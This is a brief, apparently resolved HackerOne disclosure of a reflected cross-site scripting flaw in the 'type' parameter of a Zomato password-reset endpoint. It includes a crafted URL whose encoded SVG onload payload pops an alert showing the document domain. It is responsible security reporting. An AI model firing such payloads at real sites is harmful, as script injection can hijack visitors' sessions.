Cross Site Scripting - type Patameter
Unknown
Vulnerability Details
Hello,
Please find below crafted URL to reproduce the reflected XSS:
> https://www.zomato.com/php/fb_login_pass_reset?type=%22%3E%3Csvg/onload=alert%28document.domain%29%3E%3Ch1%3EBoooooya!!%3C/h1%3E
Access above URL (Tested on Firefox) to reproduce the issue.
Actions
View on HackerOneReport Stats
- Report ID: 114151
- State: Closed
- Substate: resolved
- Upvotes: 1